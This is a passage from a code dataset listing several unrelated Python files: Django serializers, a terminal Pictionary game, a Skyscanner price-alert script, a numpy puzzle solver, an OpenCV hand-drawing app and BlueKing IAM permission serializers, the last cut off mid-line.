content
stringlengths
0
894k
type
stringclasses
2 values
from django.contrib.auth import get_user_model from rest_framework import serializers from phonenumber_field.serializerfields import PhoneNumberField User = get_user_model() class PhoneNumberSerializer(serializers.Serializer): phone_number = PhoneNumberField(required=True) confirmation_code = serializers.IntegerField(read_only=True) class ConfirmationCodeSerializer(PhoneNumberSerializer): confirmation_code = serializers.IntegerField(required=True) class UserSerializer(serializers.ModelSerializer): invited_users = serializers.SerializerMethodField() class Meta: model = User fields = ('phone_number', 'invite_code', 'activated_code', 'invited_users') read_only_fields = ('phone_number', 'invite_code',) def validate(self, data): request = self.context.get('request') activated_code = request.data.get('activated_code') if not activated_code: return super().validate(data) if not User.objects.filter(invite_code=activated_code).exists(): raise serializers.ValidationError( 'User with this invite code does not exist.' ) if request.user.activated_code and activated_code: raise serializers.ValidationError( 'You have already activated an invite code.' ) return super().validate(data) def get_invited_users(self, obj): invite_code = obj.invite_code return User.objects.filter(activated_code=invite_code).values_list( 'phone_number' )
python
#!/usr/bin/env python3 import sys import csv import time import random import curses import signal import pickle import datetime import argparse import subprocess from enum import Enum from copy import deepcopy as copy State = Enum('State', 'pick watch getready draw countdown check roll') class GameTerminated(Exception): def __init__(self, saved=False): self.saved = saved class ScreenTooSmall(GameTerminated): pass class Team: def __init__(self, team_id, color=None): self.id = team_id self.color = color class Game: board_str = 'ybMgRYbmG*RYbmGyRB*mGyRMbgR*YBmgRbYMg*RyBMgyBmR' category_colors = [] team_colors = [] interrupted = False # all possible game strings text_header = u'Pyctionary, a word game for geeks. ESC to quit, \'<\' to undo' text_countdown = u'Time left (Ctrl-C to interrupt): ' text_timeout = u'Time is up!' text_dice = u'Roll the dice (1-6 or 0 to randomly advance): ' text_hide_card = u'Press ENTER to hide the card' text_getready = u'Get ready! Press ENTER to start drawing!' text_draw = u'Press ENTER to start drawing' text_success_or_fail = u'(S)uccess or (F)ail? ' text_pick_card = u'Press ENTER to pick a card' text_finish_line = u'Not going forward, finish line already reached' text_save_game = u'Save game? (Y/N) ' chr_active_marker = u'▶' text_all_play_marker = u'◀▶' fmt_moving = u'Moving forward of {} positions' # sand timer, in seconds timeout = 60 def __init__(self, stdscr, categories, cards, num_teams, restore_file): self.stdscr = stdscr self.categories = categories self.cards = cards self.num_teams = num_teams self.restore_file = restore_file self.states = [] self.teams = [] # randomize active team on startup self.active_team = random.randint(0, self.num_teams-1) self.positions = [] self.card_data = [] self.time_start = 0 self.all_play = False self.state = State.pick self.cell = self.board_str[0] # actual window size self.y = curses.LINES-1 self.x = curses.COLS-1 # subwindows self.header = None self.board = None self.card = None self.legend = None self.footer = None # setup self.interface_setup() self.team_setup() def team_setup(self): for i in range(self.num_teams): self.teams.append(Team(i, color=self.team_colors[i])) self.positions.append(0) def interface_setup(self): # hide the cursor curses.curs_set(False) # diable newline mode curses.nonl() # categories curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_YELLOW) curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_BLUE) curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_MAGENTA) curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_GREEN) curses.init_pair(5, curses.COLOR_BLACK, curses.COLOR_RED) # header and footer curses.init_pair(6, curses.COLOR_BLACK, curses.COLOR_CYAN) # teams curses.init_pair(7, curses.COLOR_BLUE, 0) curses.init_pair(8, curses.COLOR_MAGENTA, 0) curses.init_pair(9, curses.COLOR_GREEN, 0) curses.init_pair(10, curses.COLOR_YELLOW, 0) # board: any color curses.init_pair(11, curses.COLOR_WHITE, curses.COLOR_WHITE) # root background curses.init_pair(12, curses.COLOR_BLACK, curses.COLOR_WHITE) # define color sets self.category_colors = [ (u'yellow', curses.color_pair(1)), (u'blue', curses.color_pair(2)), (u'magenta', curses.color_pair(3)), (u'green', curses.color_pair(4)), (u'red', curses.color_pair(5))] self.team_colors = [ (u'blue', curses.color_pair(7)), (u'magenta', curses.color_pair(8)), (u'green', curses.color_pair(9)), (u'yellow', curses.color_pair(10))] # clear screen self.stdscr.clear() # change root background #self.stdscr.bkgd(u' ', curses.color_pair(12) | curses.A_BOLD) def draw_header(self): self.header = self.stdscr.subwin(1, self.x, 0, 0) self.header.bkgd(u' ', curses.color_pair(6) | curses.A_BOLD) self.header.addstr(0, 1, self.text_header, curses.color_pair(6)) def draw_board(self): # board self.board = self.stdscr.subwin(3 + self.num_teams, self.x, 1, 0) self.update_board() def update_board(self): for i, c in enumerate(self.board_str): chars = u' ' if c == '*': attr = curses.color_pair(11) else: if c in ['y', 'Y']: attr = curses.color_pair(1) elif c in ['b', 'B']: attr = curses.color_pair(2) elif c in ['m', 'M']: attr = curses.color_pair(3) elif c in ['g', 'G']: attr = curses.color_pair(4) else: attr = curses.color_pair(5) if c.isupper(): chars = self.text_all_play_marker # if (i+1) % 12 == 0: # chars = u'||' self.board.addstr(1, 10+2*i, chars, attr) # teams for team in self.teams: self.board.addstr(3+team.id, 10, (self.positions[team.id] + 1) * u' ', team.color[1] | curses.A_REVERSE) #self.board.addstr(3+team.id, 1, u' {}'.format(team.color[0]), team.color[1]) base_text = u'{:^7s}'.format(team.color[0]) args = team.color[1] if self.active_team == team.id: text = self.chr_active_marker + base_text args |= curses.A_REVERSE else: text = u' ' + base_text self.board.addstr(3+team.id, 1, text, args) def draw_card(self): tot_y = len(self.categories)*3+2 tot_x = 40 self.card = self.stdscr.subwin(tot_y, tot_x, 9+(self.y-tot_y-9-6)//2, (self.x-tot_x)//2) self.card.box() def update_card(self): for i, _ in enumerate(self.categories): self.card.addstr(1+i*3, 1, u' '*38, self.category_colors[i][1]) text = self.card_data[i] args = self.category_colors[i][1] if self.category_colors[i][0].startswith(self.cell.lower()): text = u'*** {} ***'.format(text) self.card.addstr(2+i*3, 1, u'{:^38s}'.format(text), args) self.card.addstr(3+i*3, 1, u' '*38, self.category_colors[i][1]) def blank_card(self): for i, _ in enumerate(self.categories): self.card.addstr(1+i*3, 1, u' '*38) self.card.addstr(2+i*3, 1, u' '*38) self.card.addstr(3+i*3, 1, u' '*38) def draw_legend(self): padding = 0 self.legend = self.stdscr.subwin(3, self.x, self.y-3-3, 0) for i, cat in enumerate(self.categories): self.legend.addstr(1, 10+padding, u' {} '.format(cat), self.category_colors[i][1]) padding += len(cat)+3 def draw_footer(self): self.footer = self.stdscr.subwin(3, self.x, self.y-3, 0) self.footer.bkgd(u' ', curses.color_pair(6)) def draw_interface(self): self.draw_header() self.draw_board() self.draw_card() self.draw_legend() self.draw_footer() self.stdscr.refresh() def pick_card(self): idx = random.choice(range(len(self.cards))) self.card_data = self.cards[idx] del self.cards[idx] def update_countdown(self, elapsed): # dark (or red) stripe self.footer.addstr(1, 34, u' '*self.timeout, curses.color_pair(5) if 10 > (self.timeout - elapsed) else curses.A_REVERSE) # white stripe self.footer.addstr(1, 34 + (self.timeout - elapsed), u' '*elapsed, curses.color_pair(11)) def check_size(self): if not self._big_enough(): saved = False if self.states: self.save_game() saved = True raise ScreenTooSmall(saved) def _big_enough(self): self.y, self.x = self.stdscr.getmaxyx() if self.x < 104 or self.y < 32: return False return True def get_state(self): return [ self.active_team, copy(self.positions), copy(self.card_data), self.all_play, self.state, ] def load_state(self, active_team, positions, card_data, all_play, state): self.active_team = active_team self.positions = positions self.card_data = card_data self.all_play = all_play self.state = state def save_game(self): obj = { 'categories': self.categories, 'cards': self.cards, 'num_teams': self.num_teams, 'states': self.states, 'teams': self.teams, 'active_team': self.active_team, 'positions': self.positions, 'card_data': self.card_data, 'time_start': self.time_start, 'all_play': self.all_play, 'state': self.state, 'cell': self.cell} with open(self.restore_file, 'wb') as f: pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL) def restore_game(self, fname=False): restore_file = fname if fname else self.restore_file with open(restore_file, 'rb') as f: game = pickle.load(f) self.categories = game['categories'] self.cards = game['cards'] self.num_teams = game['num_teams'] self.states = game['states'] self.teams = game['teams'] self.active_team = game['active_team'] self.positions = game['positions'] self.card_data = game['card_data'] self.time_start = game['time_start'] self.all_play = game['all_play'] self.state = game['state'] self.cell = game['cell'] def loop(self): self.state_prev = '' self.next_state = self.state self.all_play_prev = False key = 0 self.check_size() self.draw_interface() while True: # ESC to quit if key == 27: self.footer.clear() self.footer.addstr(1,1, self.text_save_game) self.footer.refresh() while True: key = self.footer.getch() if key in [ord(x) for x in 'yYnN']: break if chr(key).upper() == 'Y': self.save_game() raise GameTerminated(saved=True) else: raise GameTerminated(saved=False) # resize window elif key == curses.KEY_RESIZE: # clear the screen to avoid artifacts self.stdscr.erase() # update screen size if not self._big_enough(): self.stdscr.erase() self.stdscr.addstr(1, 1, u'Screen too small!') self.stdscr.refresh() key = self.stdscr.getch() continue else: self.draw_interface() elif key == ord('<'): if len(self.states) > 0: if self.state in [State.check, State.roll] \ or self.state == State.pick and len(self.states) > 1: del self.states[-1] self.load_state(*self.states[-1]) self.next_state = self.state self.stdscr.erase() self.draw_interface() self.stdscr.refresh() else: if self.state_prev != self.state \ and self.state in [State.pick, State.check, State.roll]: self.states.append(self.get_state()) if self.all_play: self.footer.bkgd(u' ', curses.color_pair(1)) else: self.footer.bkgd(u' ', curses.color_pair(6)) # game automaton if self.state == State.pick: # game self.cell = self.board_str[self.positions[self.active_team]] if key in [curses.KEY_ENTER, 10, 13]: self.pick_card() self.next_state = State.watch curses.ungetch(128) # interface self.blank_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_pick_card) self.footer.refresh() elif self.state == State.watch: # game if key in [curses.KEY_ENTER, 10, 13]: self.next_state = State.getready curses.ungetch(128) # interface (display card) self.update_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_hide_card) self.footer.refresh() elif self.state == State.getready: if key in [curses.KEY_ENTER, 10, 13]: self.next_state = State.draw curses.ungetch(128) # interface (blank card and add countdown text in the footer) self.blank_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_getready) self.footer.refresh() elif self.state == State.draw: # game self.time_start = time.time() Game.interrupted = False self.next_state = State.countdown curses.ungetch(128) elif self.state == State.countdown: # game elapsed = int(time.time() - self.time_start) if elapsed > self.timeout: self.next_state = State.check # interface try: subprocess.Popen(['aplay', 'data/alarm.wav'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) except: pass self.footer.clear() self.footer.addstr(1, 1, self.text_timeout) self.footer.refresh() curses.napms(3000) curses.ungetch(128) elif Game.interrupted: self.next_state = State.check curses.ungetch(128) # interface self.footer.clear() else: try: curses.ungetch(128) except: pass # interface self.footer.addstr(1, 1, self.text_countdown) self.update_countdown(elapsed) # interface self.footer.refresh() elif self.state == State.check: # interface self.update_card() self.card.refresh() self.footer.clear() # game if self.all_play: # interface text = u'Winning team ' self.footer.addstr(1, 1, text) needle = len(text) text = u', '.join(u'({}){}'.format(team.color[0][0].upper(), team.color[0][1:]) for team in self.teams) text += u', (N)one: ' self.footer.addstr(1, 1 + needle, text) team_str = u'bmgy' if key in [ord('N'), ord('n')]: self.active_team = (self.active_team + 1) % self.num_teams self.next_state = State.pick # all play lasts at most 1 round self.all_play = False curses.ungetch(128) # interface self.update_board() self.board.refresh() self.footer.addch(chr(key).upper()) self.footer.refresh() curses.napms(2000) elif key in [ord(x) for x in team_str + team_str.upper()]: for team in self.teams: if team.color[0][0].upper() == chr(key).upper(): self.active_team = team.id break self.next_state = State.roll # all play lasts at most 1 round self.all_play = False curses.ungetch(128) # interface self.footer.addch(chr(key).upper()) self.footer.refresh() curses.napms(2000) else: # interface self.footer.addstr(1, 1, self.text_success_or_fail) if key in [ord(x) for x in 'sSfF']: upper_key = chr(key).upper() if upper_key == 'S': self.next_state = State.roll else: self.active_team = (self.active_team + 1) % self.num_teams self.next_state = State.pick curses.ungetch(128) # interface self.update_board() self.board.refresh() self.footer.addch(upper_key) self.footer.refresh() curses.napms(2000) elif self.state == State.roll: # interface self.update_board() self.board.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_dice) # game if key in [ord(str(x)) for x in range(7)]: if chr(key) == '0': t = time.time() tout = random.randint(2,7) result = 1 while (time.time()-t) < tout: result = random.randint(1, 6) self.footer.addch(1, len(self.text_dice) + 1, str(result)) self.footer.refresh() curses.napms(100) else: result = int(chr(key)) self.footer.addch(1, len(self.text_dice) + 1, str(result)) self.footer.refresh() curses.napms(1000) new_position = min(self.positions[self.active_team] + result, len(self.board_str)-1) # interface self.footer.erase() if self.positions[self.active_team] != new_position: if self.board_str[new_position].isupper(): self.all_play = True # interface self.footer.addstr(1, 1, self.fmt_moving.format(new_position - self.positions[self.active_team])) # game self.positions[self.active_team] = new_position else: # interface self.footer.addstr(1, 1, self.text_finish_line) # game self.next_state = State.pick # interface self.footer.refresh() self.update_board() self.board.refresh() curses.ungetch(128) curses.napms(2000) if self.all_play: self.footer.addstr(1, self.x-10, u'ALL PLAY!') else: self.footer.addstr(1, self.x-10, u' '*9) key = self.footer.getch() self.state_prev = self.state self.state = self.next_state self.all_play_prev = self.all_play curses.napms(10) def load_cards(path): cards = [] try: with open(path) as f: cards = [card for card in csv.reader(f)] except: die(u'Unable to load the card file, aborting.\n') return cards def signal_handler(signal, frame): Game.interrupted = True def parse_arguments(): parser = argparse.ArgumentParser(description=u'Pyctionary, a word game for geeks') parser.add_argument('--teams', type=int, default=2, help='Number of teams (must be between 2-4, default is 2)') parser.add_argument('--cards', type=str, default='cards/it.csv', help='Path to a card file (must be in csv format, default to cards/it.csv)') parser.add_argument('--restore', type=str, help='Restore a previous game state') args = parser.parse_args() return args def die(msg): sys.stderr.write(msg) sys.stderr.flush() sys.exit(1) def start_game(stdscr, categories, cards, num_teams, restore, restore_file): game = Game(stdscr, categories, cards, num_teams, restore_file) if restore: game.restore_game(restore) signal.signal(signal.SIGINT, signal_handler) game.loop() def main(): args = parse_arguments() if args.teams > 4 or args.teams < 2: die(u'Number of teams must be between 2 and 4.\n') restore_file = '/tmp/pyctionary_{}.pickle'.format( datetime.datetime.now().strftime('%Y%m%d-%H%M%S')) cards = load_cards(args.cards) categories = cards[0] cards = cards[1:] try: curses.wrapper(start_game, categories, cards, args.teams, args.restore, restore_file) except ScreenTooSmall as e: if e.saved: sys.stderr.write(u'Game saved as {}\n'.format(restore_file)) die(u'Minimum term size 104x32, aborting.\n') except GameTerminated as e: if e.saved: sys.stderr.write(u'Game saved as {}\n'.format(restore_file)) except pickle.UnpicklingError: sys.stderr.write(u'Malformed restore file provided, aborting\n') if __name__ == '__main__': main()
python
text = """ //------------------------------------------------------------------------------ // Explicit instantiation. //------------------------------------------------------------------------------ #include "computeGenerators.cc" namespace Spheral { template void computeGenerators<Dim< %(ndim)s >, vector<NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::iterator> (vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<const NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::iterator> (vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<const NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator> (vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<NodeList<Dim< %(ndim)s > >*>::const_iterator, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator> (vector<NodeList<Dim< %(ndim)s > >*>::const_iterator nodeListBegin, vector<NodeList<Dim< %(ndim)s > >*>::const_iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); } """
python
import requests import json import datetime import pprint class FlightTicketPriceNotificationFromSkyscanner(): SkyscannerApiKey = "sk-----" MailgunApiKey = "key------" MailgunSandbox = "sandbox-----" MailgunEmail = "-----@-----" conditions = [{ "country": "PL", "currency": "PLN", "originplace": "WAW", "destinationplace": "SEL", "outbounddate": "2018-02-09", "inbounddate": "2018-02-24", "adults": "1", "children": "0", "infants": "0", "stops": "0", "notifyMinPrice": "2500", }] def start(self): for condition in self.conditions: parsedFlightTicketInfoData = self.parseFlightTicketInfoFromSkyscanner(condition) flightTicketInfoData = self.handlingFlightTicketInfo(condition,parsedFlightTicketInfoData) self.notifyThoughEmail(condition,flightTicketInfoData) pass def parseFlightTicketInfoFromSkyscanner(self, condition): skyscannerSessionUrl = "http://business.skyscanner.net/apiservices/pricing/v1.0/" payload = { "locale": "pl-PL", "locationSchema": "iata", "apikey": self.SkyscannerApiKey, "grouppricing": "on", "cabinclass": "Economy" } payload.update(condition) headers = { 'connection': "keep-alive", 'content-length': "245", 'content-type': "application/x-www-form-urlencoded", 'host': "business.skyscanner.net", 'origin': "http://business.skyscanner.net", 'user-agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", 'cache-control': "no-cache", } SessionResponse = requests.request('POST', skyscannerSessionUrl, data=payload, headers=headers) if isinstance(SessionResponse, str): return skyscannerPollingUrl = SessionResponse.headers['location'] querystring = {"apikey": self.SkyscannerApiKey} stops = condition.get("stops") if stops is not None: querystring.update({"stops": stops}) pollingResponse = json.loads(requests.request("GET", skyscannerPollingUrl, params=querystring).content) return pollingResponse def handlingFlightTicketInfo(self, condition, parsedFlightTicketInfoData): flightTicketInfoArray = [] itineraries = parsedFlightTicketInfoData.get("Itineraries",[]) legs = parsedFlightTicketInfoData.get("Legs",[]) carriers = parsedFlightTicketInfoData.get("Carriers",[]) agents = parsedFlightTicketInfoData.get("Agents",[]) places = parsedFlightTicketInfoData.get("Places",[]) for itinerary in itineraries: flightTicketInfo = {} flightTicketInfo['searchDate'] = datetime.datetime.utcnow().strftime("%Y-%m-%d") firstitemOutbound = itinerary['OutboundLegId'] firstitemInbound = itinerary['InboundLegId'] firstitemSeller = itinerary['PricingOptions'][0]['Agents'][0] flightTicketInfo["OutboundLegId"] = firstitemOutbound flightTicketInfo["InboundLegId"] = firstitemInbound flightTicketInfo["price"] = int(itinerary['PricingOptions'][0]['Price']) for agent in agents: if int(firstitemSeller) == int(agent["Id"]): flightTicketInfo['seller'] = agent["Name"] for leg in legs: if leg["Id"].find(firstitemOutbound) > -1: firstitemOriginStationNum = leg["OriginStation"] firstitemDestinationStationNum = leg["DestinationStation"] firstitemCarrier = leg["Carriers"][0] flightTicketInfo['outboundDepartTime']= leg['Departure'][11:][:-3] flightTicketInfo['outboundArriveTime'] = leg["Arrival"][11:][:-3] flightTicketInfo['stops'] = len(leg["Stops"]) for place in places: if int(place["Id"]) == int(firstitemOriginStationNum): flightTicketInfo['outboundAirportCode'] = place["Code"] if int(place["Id"]) == int(firstitemDestinationStationNum): flightTicketInfo['inboundAirportCode'] = place["Code"] for carrier in carriers: if int(carrier["Id"]) == int(firstitemCarrier): flightTicketInfo['outboundAirline'] = carrier["Name"] flightTicketInfo['outboundAirlinecode'] = carrier["Code"] flightTicketInfo['outboundAirlinecode'] += leg["FlightNumbers"][0]["FlightNumber"] if leg["Id"].find(firstitemInbound) > -1: flightTicketInfo['inboundDepartTime'] = leg['Departure'][11:][:-3] flightTicketInfo['inboundArriveTime'] = leg["Arrival"][11:][:-3] for carrier in carriers: if int(carrier["Id"]) == int(firstitemCarrier): flightTicketInfo['inboundAirline'] = carrier["Name"] flightTicketInfo['inboundAirlinecode'] = carrier["Code"][:6] flightTicketInfo['inboundAirlinecode'] += leg["FlightNumbers"][0]["FlightNumber"] flightTicketInfo.update(condition) flightTicketInfoArray.append(flightTicketInfo) pprint.pprint(flightTicketInfoArray) return flightTicketInfoArray def notifyThoughEmail(self, condition, flightTicketInfoArray): notifyMinPrice = condition.get("notifyMinPrice") notifyCheckArray = [] for flightTicketInfo in flightTicketInfoArray: price = flightTicketInfo.get("price") if price is None: continue if int(notifyMinPrice) > int(price): notifyCheckArray.append(flightTicketInfo) if len(notifyCheckArray) > 0: emailMsg = "congratulation! The ticket price is less then your minimum price filter. \n" emailMsg += json.dumps(notifyCheckArray, sort_keys=True, indent=4) requests.post( f"https://api.mailgun.net/v3/{self.MailgunSandbox}.mailgun.org/messages", auth=("api", self.MailgunApiKey), data={"from": f"Mailgun Sandbox <postmaster@{self.MailgunSandbox}.mailgun.org>", "to": self.MailgunEmail, "subject": "congratulation! The ticket price is less then your minimum price filter.", "text": json.dumps(notifyCheckArray, sort_keys=True, indent=4)}) return notifyCheckArray if __name__ == '__main__': FlightTicketPriceNotificationFromSkyscanner().start()
python
import sys import typing import numpy as np def solve( x: np.array, y: np.array, ) -> typing.NoReturn: n = x.size ord = np.argsort(x, kind='mergesort') x, y = x[ord], y[ord] mn = np.minimum.accumulate(y) mx = np.maximum.accumulate(y) def possible(d): j = np.searchsorted(x, x - d, 'right') - 1 j, v = j[j >= 0], y[j >= 0] return np.any( (np.abs(mx[j] - v) >= d) | (np.abs(mn[j] - v) >= d), ) def binary_search(): lo, hi = 0, 1 << 40 while hi - lo > 1: d = (lo + hi) // 2 if possible(d): lo = d else: hi = d return lo print(binary_search()) def main() -> typing.NoReturn: n = int(input()) x, y = np.array( sys.stdin.read().split(), dtype=np.int64, ).reshape(n, 2).T solve(x, y) main()
python
try: import sys from cv2 import cv2 import numpy as np import time import math import utils.hand_tracking as ht except ModuleNotFoundError: sys.path.append("../") finally: import utils.hand_tracking as ht def main(show_fps=False, video_src=0): # Capture the video stream Webcam cap = cv2.VideoCapture(video_src) cap.set(3, 1280) cap.set(4, 720) previous_time = 0 track = ht.HandTracking(min_detection_confidence=0.85, min_tracking_confidence=0.7) x_draw, y_draw = 0, 0 canvas = np.zeros((720, 1280, 3), np.uint8) # Infinite loop waiting for key 'q' to terminate while cv2.waitKey(1) != (ord('q') or ord('Q')): # # Read the frame success, img = cap.read() # # Flip input image horizontally flip_image = cv2.flip(img, 1) # Track and revert the image track.find_hand(flip_image) track.find_finger_tips( flip_image, finger_list=None, # Add Finger string list else None show_connected=True, show_landmarks=True, draw_tips=False, hand_id_list=[0] ) finger_up_dict = track.is_finger_up(flip_image, hand_id_list=[0], threshold=2) finger_list = finger_up_dict['0'] if len(finger_list): finger_sum = sum(finger_list) landmarks = finger_up_dict['lms'] # Index Up - Draw Mode if finger_sum == 1 and finger_list[1]: x, y = landmarks['0'][8][:2] cv2.circle(flip_image, (x, y), 15, (255, 0, 255), cv2.FILLED) if not x_draw and not y_draw: x_draw, y_draw = x, y cv2.line(canvas, (x_draw, y_draw), (x, y), (255, 0, 255), 15) x_draw, y_draw = x, y # All Fingers except thumb - Erase mode elif finger_sum == 4 and not finger_list[0]: x1, y1 = landmarks['0'][12][:2] cv2.circle(flip_image, (x1, y1), 50, (255, 255, 255), cv2.FILLED) cv2.circle(canvas, (x1, y1), 50, (0, 0, 0), cv2.FILLED) if not x_draw and not y_draw: x_draw, y_draw = x1, y1 cv2.line(canvas, (x1, y1), (x_draw, y_draw), (0, 0, 0), 50) x_draw, y_draw = x1, y1 # Yo - Clear All elif finger_sum == 3 and not finger_list[2] and not finger_list[3]: canvas = np.zeros((720, 1280, 3), np.uint8) # Move Mode else: x_draw, y_draw = 0, 0 # Calculate FPS if show_fps: current_time = time.time() fps = 1 / (current_time - previous_time) previous_time = current_time # Include FPS text in image cv2.putText(flip_image, "FPS: {}".format(int(fps)), (10, 70), # Position cv2.FONT_HERSHEY_PLAIN, 1, # Font size (0, 0, 255), 2 # Thickness ) # Show the resultant image img_gray = cv2.cvtColor(canvas, cv2.COLOR_BGR2GRAY) _, img_gray = cv2.threshold(img_gray, 50, 255, cv2.THRESH_BINARY_INV) img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2BGR) flip_image = cv2.bitwise_and(flip_image, img_gray) flip_image = cv2.bitwise_or(flip_image, canvas) cv2.imshow("Output", flip_image) cap.release() cv2.destroyAllWindows() if __name__ == "__main__": main(show_fps=True)
python
# -*- coding: utf-8 -*- """ TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available. Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import sys import pytz from django.conf import settings from rest_framework import serializers from backend.common.serializers import BaseAction from backend.common.time import PERMANENT_SECONDS from backend.service.constants import PolicyEnvConditionTypeEnum, PolicyEnvTypeEnum from backend.util.uuid import gen_uuid class ValueFiled(serializers.Field): def to_representation(self, value): return value def to_internal_value(self, data): if not isinstance(data, (bool, int, str)): raise serializers.ValidationError("value only support (bool, int, float, str)") if isinstance(data, int) and (data > sys.maxsize or data < -sys.maxsize - 1): raise serializers.ValidationError(f"int value must be in range [{-sys.maxsize - 1}:{sys.maxsize}]") return data class ResourceSLZ(serializers.Serializer): system_id = serializers.CharField(label="系统ID") type = serializers.CharField(label="资源类型") type_name = serializers.CharField(label="资源类型名称", allow_blank=True) id = serializers.CharField(label="资源实例ID") name = serializers.CharField(label="资源实例ID名称", allow_blank=True, trim_whitespace=False) class InstanceSLZ(serializers.Serializer): type = serializers.CharField(label="资源类型") name = serializers.CharField(label="资源类型名称", allow_blank=True) path = serializers.ListField( label="层级链路", child=serializers.ListField(label="链路", child=ResourceSLZ(label="节点"), allow_empty=False), required=True, allow_empty=False, ) class ValueSLZ(serializers.Serializer): id = ValueFiled(label="属性VALUE") name = serializers.CharField(label="属性VALUE名称", allow_blank=True) class AttributeSLZ(serializers.Serializer): id = serializers.CharField(label="属性KEY") name = serializers.CharField(label="属性KEY名称", allow_blank=True) values = serializers.ListField(label="属性VALUE", child=ValueSLZ(label="值"), allow_empty=False) class ConditionSLZ(serializers.Serializer): id = serializers.CharField(label="条件id", allow_blank=True) instances = serializers.ListField(label="拓扑选择", child=InstanceSLZ(label="拓扑实例")) attributes = serializers.ListField(label="属性选择", child=AttributeSLZ(label="属性")) def validate(self, data): if not data["instances"] and not data["attributes"]: raise serializers.ValidationError({"instances": ["instance and attribute must not be both empty"]}) if not data["id"]: data["id"] = gen_uuid() return data class ResourceTypeSLZ(serializers.Serializer): system_id = serializers.CharField(label="资源类型系统ID") type = serializers.CharField(label="资源类型") condition = serializers.ListField(label="生效条件", child=ConditionSLZ(label="条件")) def validate(self, data): """ 检查条件的实例数量不超过1万 """ count = 0 for c in data["condition"]: for i in c["instances"]: if i["type"] == data["type"]: count += len(i["path"]) if count > settings.SINGLE_POLICY_MAX_INSTANCES_LIMIT: raise serializers.ValidationError( {"condition": ["实例数量超过限制 {} 个".format(settings.SINGLE_POLICY_MAX_INSTANCES_LIMIT)]} ) return data class EnvConditionValueSLZ(serializers.Serializer): name = serializers.CharField(label="显示名称", required=False, allow_blank=True, default="") value = ValueFiled(label="环境属性值") # for validate class WeekdayEnvValueSLZ(EnvConditionValueSLZ): value = serializers.IntegerField(label="环境属性值", max_value=6, min_value=0) # for validate class HMSEnvValueSLZ(EnvConditionValueSLZ): value = serializers.RegexField(label="环境属性值", regex=r"^([0-1][0-9]|(2[0-3])):([0-5][0-9]):([0-5][0-9])$") # for validate class TZEnvValueSLZ(EnvConditionValueSLZ): value = serializers.CharField(label="环境属性值") def validate(self, attrs): value = attrs["value"] if value not in pytz.all_timezones: serializers.ValidationError({"value": ["{} is not a legal time zone representation".format(value)]}) return attrs class EnvConditionSLZ(serializers.Serializer): type = serializers.ChoiceField(label="环境属性条件类型", choices=PolicyEnvConditionTypeEnum.get_choices()) values = serializers.ListField(label="条件的值", child=EnvConditionValueSLZ(label="VALUE")) # for validate class WeekdayEnvConditionSLZ(EnvConditionSLZ): values = serializers.ListField( label="条件的值", child=WeekdayEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=1, max_length=7 ) def validate(self, attrs): if len(attrs["values"]) != len({v["value"] for v in attrs["values"]}): raise serializers.ValidationError({"values": ["must not 